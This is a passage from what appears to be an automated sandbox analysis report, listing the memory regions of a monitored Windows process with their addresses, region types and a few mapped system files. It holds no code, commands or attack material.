pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2103 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2104 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2105 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2106 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2107 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2108 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2109 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2110 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2111 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2112 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2113 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2114 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2115 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2116 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2117 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2118 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2119 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2120 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2121 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2122 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2123 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2124 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2125 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2126 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2127 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2128 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2129 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2130 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2131 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2132 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2133 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2134 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2135 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2136 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2137 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2138 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2139 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2140 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2141 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2142 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2143 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2144 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2160 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2161 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2162 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2163 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2164 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2165 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2166 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2205 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2206 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2207 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2208 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2212 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2213 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2214 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2215 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2216 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2217 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2218 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2219 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2220 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2221 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2222 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2223 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2224 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2225 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2226 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2227 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2228 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2229 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2230 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2231 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2232 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2233 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2234 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2235 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2236 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2237 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2238 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2239 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2240 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2241 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2242 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2243 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2244 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2245 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2246 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2247 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2248 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2249 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2250 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2251 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2252 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2253 start_va = 0x7a10000 end_va = 0x7b09fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007a10000" filename = "" Region: id = 2254 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2255 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2256 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2257 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2258 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2259 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2260 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2261 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2262 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2263 start_va = 0x7a10000 end_va = 0x7b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a10000" filename = "" Region: id = 2264 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2265 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 2277 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2278 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2279 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2280 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2288 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2289 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2290 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2291 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2307 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2308 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2309 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2310 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2316 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2317 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2318 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2319 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2332 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2333 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2334 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2335 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2353 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2354 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2355 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 2356 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2358 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2359 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2361 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2362 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2363 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2364 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2388 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2389 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2390 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2391 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2392 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2393 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2394 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2397 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2411 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2412 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2413 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2414 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2416 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2417 start_va = 0x10b70000 end_va = 0x10beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010b70000" filename = "" Region: id = 2418 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2419 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2420 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2457 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2458 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 2459 start_va = 0x10bf0000 end_va = 0x10c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010bf0000" filename = "" Region: id = 2461 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2462 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2463 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2492 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2493 start_va = 0x10c70000 end_va = 0x10ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c70000" filename = "" Region: id = 2494 start_va = 0x10cf0000 end_va = 0x10d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cf0000" filename = "" Region: id = 2495 start_va = 0x540000 end_va = 0x542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2496 start_va = 0x570000 end_va = 0x573fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2497 start_va = 0x580000 end_va = 0x582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2505 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2506 start_va = 0x570000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2507 start_va = 0x7b40000 end_va = 0x7b61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b40000" filename = "" Region: id = 2508 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2509 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2510 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2514 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2518 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2519 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2520 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2523 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2524 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2525 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2526 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2546 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2547 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2548 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2549 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2551 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2552 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2553 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2554 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2563 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2564 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2565 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2566 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2635 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2636 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2637 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 